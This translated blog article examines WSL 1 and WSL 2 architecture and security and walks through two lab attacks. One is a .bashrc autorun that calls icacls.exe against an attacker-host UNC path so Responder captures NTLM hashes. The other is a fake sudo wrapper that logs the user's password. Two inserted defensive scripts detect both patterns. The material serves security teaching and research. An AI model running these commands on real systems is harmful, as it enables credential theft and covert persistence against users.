WSL Experiments. Part 1

Hello, Habr! In October OTUS is launching a new stream of the course "Linux Security". Ahead of the course start, we are sharing an article written by one of our instructors, Alexander Kolesnikov.


In 2016, Microsoft introduced the IT community to a new technology, WSL (Windows Subsystem for Linux), which promised to bring together two previously irreconcilable competitors that had fought for popularity among both ordinary and advanced OS users: Windows and Linux. The technology made it possible to use Linux tools in a Windows environment without having to boot Linux, for example via multi-boot. On Habr you can find a large number of articles describing the benefits of using WSL. Unfortunately, at the time this article was written, no studies of the security of this symbiosis of operating systems could be found on this resource. This post is an attempt to fix that. The article covers the architectural features of WSL 1 and WSL 2 and examines several examples of attacks on systems that use these technologies. The article is split into 2 parts. The first presents the main theoretical attack methods from the Linux and Windows sides. The second will cover setting up a test environment and reproducing the attacks.

WSL 1: architectural features

To look into WSL security issues properly, we first need to identify the main details of how the subsystem is implemented. One of the main user tasks that WSL solves is the ability to work in a Linux terminal on a host running Windows. The compatibility on offer was also so native that Linux executables (ELFs) could be run directly on a Windows system. To achieve these goals, a special subsystem was created in Windows 10 that allows Linux applications to run using a set of specific system calls; in other words, an attempt was made to map the set of Linux syscalls onto Windows. Physically, this was implemented by adding new drivers and a new process format. Architecturally, it looked like this:

[Figure: WSL 1 architecture diagram]

In fact, interaction with the Linux operating system was organized through several kernel modules and a special type of process, the pico process. From the diagram above you can see that a process running in the Linux instance on the host must be native and must use the same resources as regular Windows applications. But how is this achieved? The Drawbridge project developed process concepts for Windows that provided all the operating system components needed (depending on its version) to run an application of another OS.

Note that the proposed abstraction made it possible not to focus on the operating system (in particular, Windows) in which a process of another OS is expected to start, and offered a general approach.

Thus, any application inside a pico process could run without regard to the Windows kernel:

  1. Problems of compatibility and translation of system calls must be solved by special providers;
  2. Access control must be performed through the Security Monitor. The monitor resides in the kernel, so Windows needed an upgrade in the form of a new driver that could act as a provider for such processes.

The pico process prototype is shown below:

[Figure: pico process prototype]

Since the Linux file system uses case-sensitive file and directory names, 2 types of file systems were added to Windows for working with WSL: VolFS and DriveFS. VolFS is an implementation of the Linux file system. DriveFS is a file system that works by Windows rules but can optionally be made case-sensitive.

WSL 2

WSL 1 had a number of limitations that prevented it from being used for the widest range of tasks: for example, it could not run 32-bit Linux applications, and device drivers could not be used. Therefore, in 2020, WSL 2 was released, which changed the approach to building the subsystem. WSL 2 is an optimized virtual machine that matches the resource consumption characteristics of WSL 1. Now, depending on the problems being solved, a Windows user can choose the required version of the Linux subsystem. To mitigate possible vulnerabilities, WSL 2 was implemented on top of Hyper-V in Windows 10. In this form, Windows can run the Linux kernel in isolation. It is worth remembering that version 1 of WSL was introduced as a beta feature that was meant to show the direction of Windows development in this area, so the move to Hyper-V was inevitable. The final architecture looks like this:

[Figure: WSL 2 architecture diagram]

In this version, the Windows and Linux kernels have their own resources, and they intersect only in the file system, and even that intersection is not complete. Interaction between the file systems goes through a client-server wrapper that works over the 9P protocol.

Today Microsoft provides the ability to switch between WSL 1 and WSL 2. Both versions are available for use.

WSL security

At the moment, there are several works describing approaches to using legitimate OS tools to attack the interaction between the subsystems. We will use their scenarios to check whether the attacks are still relevant at the time of writing. General list of attacks and scenarios:

1. File system implementation: access rights, presence of shared directories/data exchange mechanisms.

Research was carried out to identify violations of access rules in the directions Linux FS->Windows FS and Windows FS->Linux FS. The research demonstrated the ability to modify a given file inside the target OS. Attempts were also made to replace, duplicate and delete parts of the file systems.

Scenario:

  • A. Attack from the Windows operating system: modifying files from the /etc directory of the Linux OS.
  • B. Attack from the Linux operating system: modifying files in the directories C:\Windows, C:\Program Files, C:\Users\<User>

2. Network stack implementation.

Research was carried out using examples of attacks from the Linux operating system on Windows. Features of the network stack were used, namely the authentication mechanisms on various resources.

Scenario:

  • Opening access to a port that is in use on the Windows system
  • Opening a port without the appropriate rights
  • Running a reverse shell using an ELF file on the Windows operating system.

3. Hiding the launch of malicious software processes using the WSL subsystem.

The research was based on a simple fact: in the case of WSL 1, security subsystems cannot intercept events in another kernel that works through a legitimate provider from the operating system. In the case of WSL 2, there is no way to view events that occur in a separate kernel inside the lightweight virtual machine.

Scenario:

1) Launch an application for remote access to the system and look at the logged events.

WSL 1 experiments: hash interception (Windows)

Finally we get to the practical part. First, you need to set up a test environment. All experiments will be run on a test bench with Windows 10 2004 installed. An Ubuntu 18.04 image was chosen as the operating system image for WSL. The image was chosen at random, and any other will work the same way. Commands for setting up the test bench:

First you need to start powershell.exe as administrator.

For WSL 1 you need to run the commands:

  1. Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux # Enable the WSL feature
  2. Invoke-WebRequest -Uri https://aka.ms/wsl-ubuntu-1804 -OutFile ~/Ubuntu.appx -UseBasicParsing # Download the Linux image from the Microsoft Store
  3. Ubuntu.appx install --root # Install the image
  4. You may have to click through the setup process and create a new user with fewer rights than root. For our tests this will be the ordinary user sam.
  5. Restart-Computer # Reboot

After the test bench restarts, you can call the bash command. If everything worked correctly, you will see output like this in the Windows console:

[Screenshot: bash output in the Windows console]

We will use a Kali Linux distribution as the attacker's machine; all machines must be on the same local network.

Let's assume we have unprivileged access to WSL on the Windows machine. Let's try to attack the Linux operating system by calling a command from Linux. To carry out the attack, we will use a simple autorun technique: we will add our script so that it is executed in the Linux environment. To do this, you need to change the .bashrc file.

On the machine with WSL, we run:

  1. bash
  2. Go to the user's home directory: cd /home/sam/
  3. echo "/home/sam/.attack.sh" >> .bashrc
  4. echo 'icacls.exe "\\\\attacker_ip\\shareName\\" > /dev/null 2>&1' >> .attack.sh
  5. chmod u+x .attack.sh
  6. exit

On the Kali Linux machine, we run:

  1. Responder -I eth0 -rdvw

On the Windows machine, start bash.

We wait for the result on the Kali Linux machine:

[Screenshot: result on the Kali Linux machine]

So, we obtained the Windows user's hashes through the WSL subsystem by executing a command on the Linux system.
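The persistence pattern used in this experiment (a startup file that runs a helper script, which in turn calls a Windows executable with a UNC path) can be checked for from the defender's side. The shell script below is an added example, not code from the article; the function names, the regular expressions and the sample home directory (including the documentation address 192.0.2.10) are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the article): audit a WSL user's shell startup files
# for lines that call Windows executables or reference UNC paths.

# \\host\share, also when the backslashes are doubled by shell quoting
UNC_RE='\\{2,}[A-Za-z0-9._-]+\\+[A-Za-z0-9._$-]+'
# any word ending in .exe (WSL interop runs Windows binaries by name)
EXE_RE='(^|[^A-Za-z0-9_])[A-Za-z0-9_./-]+\.exe([^A-Za-z0-9_]|$)'

# Print "file:line:text" for each suspicious line in one file.
scan_file() {
    # /dev/null as a second operand makes grep always print the file name
    grep -nE -e "$UNC_RE" -e "$EXE_RE" "$1" /dev/null 2>/dev/null || true
}

# Scan the startup files in a home directory and every script inside that
# home which they mention by absolute path (the .attack.sh indirection).
audit_home() {
    home=${1%/}
    for rc in .bashrc .bash_profile .bash_login .profile; do
        [ -f "$home/$rc" ] || continue
        scan_file "$home/$rc"
        grep -oE "$home/[A-Za-z0-9._/-]+" "$home/$rc" | sort -u |
        while read -r ref; do
            if [ -f "$ref" ]; then scan_file "$ref"; fi
        done
    done
    return 0
}

# Constructed sample home reproducing the layout from the experiment;
# 192.0.2.10 is a documentation address, not a value from the article.
make_sample_home() {
    d=$(mktemp -d)
    printf '%s\n' "alias ll='ls -l'" "$d/.attack.sh" > "$d/.bashrc"
    printf '%s\n' 'icacls.exe "\\\\192.0.2.10\\share\\" > /dev/null 2>&1' \
        > "$d/.attack.sh"
    printf '%s\n' "$d"
}

sample=$(make_sample_home)
audit_home "$sample"
rm -rf "$sample"
```

Inside a distribution, `audit_home /home/sam` reviews one account; a hit is a line to review by hand, since legitimate startup files may also call Windows binaries.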

WSL 1 experiments: obtaining the user's password (Linux OS)

Let's run one more experiment. This time we will add several commands to the .bashrc file in order to obtain the Linux user's password.

Start bash and enter the commands:

  1. mkdir .mysudo
  2. echo 'export PATH=$HOME/.mysudo/:$PATH:' >> .bashrc
  3. echo 'read -sp "[sudo] password for $USER: " sudopass' > .mysudo/sudo
  4. echo 'echo ""' >> .mysudo/sudo
  5. echo 'sleep 2' >> .mysudo/sudo
  6. echo 'echo "Sorry, try again."' >> .mysudo/sudo
  7. echo 'echo $sudopass >> /home/sam/.mysudo/pass.txt' >> .mysudo/sudo
  8. echo '/usr/bin/sudo $@' >> .mysudo/sudo
  9. chmod +x .mysudo/sudo
  10. exit

For the attack to complete successfully, the user sam needs to call sudo in the Linux terminal. After that, the Linux OS user's password will be in the file pass.txt:

[Screenshot: contents of pass.txt]

The implementation of the attacks was given for theoretical information only.
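The wrapper in the second experiment only takes effect because a user-writable directory precedes the system directories in PATH. The shell script below is an added example, not code from the article; its function names and the sample directory tree are constructed. It lists every command in a writable PATH directory that hides a same-named command later in PATH.

```shell
#!/bin/sh
# Added example (not from the article): report commands in user-writable PATH
# directories that hide a same-named command later in PATH.

# first_in NAME PATHLIST: print the first executable NAME found in PATHLIST.
first_in() {
    list=$2
    while [ -n "$list" ]; do
        d=${list%%:*}
        case $list in *:*) list=${list#*:} ;; *) list= ;; esac
        d=${d%/}
        if [ -n "$d" ] && [ -f "$d/$1" ] && [ -x "$d/$1" ]; then
            printf '%s\n' "$d/$1"; return 0
        fi
    done
    return 1
}

# find_shadowed PATHLIST: print one "X shadows Y" line per hidden command.
# -w is evaluated for the invoking user, so run it as the audited account.
find_shadowed() {
    rest=$1
    while [ -n "$rest" ]; do
        dir=${rest%%:*}
        case $rest in *:*) rest=${rest#*:} ;; *) rest= ;; esac
        dir=${dir%/}
        [ -n "$dir" ] && [ -d "$dir" ] && [ -w "$dir" ] || continue
        for f in "$dir"/*; do
            [ -f "$f" ] && [ -x "$f" ] || continue
            if later=$(first_in "${f##*/}" "$rest"); then
                printf '%s shadows %s\n' "$f" "$later"
            fi
        done
    done
    return 0
}

# Constructed layout: a file named sudo in a directory ahead of the real one.
make_sample_tree() {
    t=$(mktemp -d)
    mkdir -p "$t/home/.mysudo" "$t/usr/bin"
    for p in "$t/home/.mysudo/sudo" "$t/usr/bin/sudo" "$t/usr/bin/ls"; do
        printf '#!/bin/sh\n' > "$p"; chmod +x "$p"
    done
    printf '%s\n' "$t"
}

tree=$(make_sample_tree)
find_shadowed "$tree/home/.mysudo/:$tree/usr/bin:"
rm -rf "$tree"
```

Inside the distribution, `find_shadowed "$PATH"` run as the account being checked gives the same report for the live environment.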

The next part of the article will describe the implementation of the 9P protocol, look at building a scanner for this protocol, and carry out an attack using it.


Source: www.habr.com
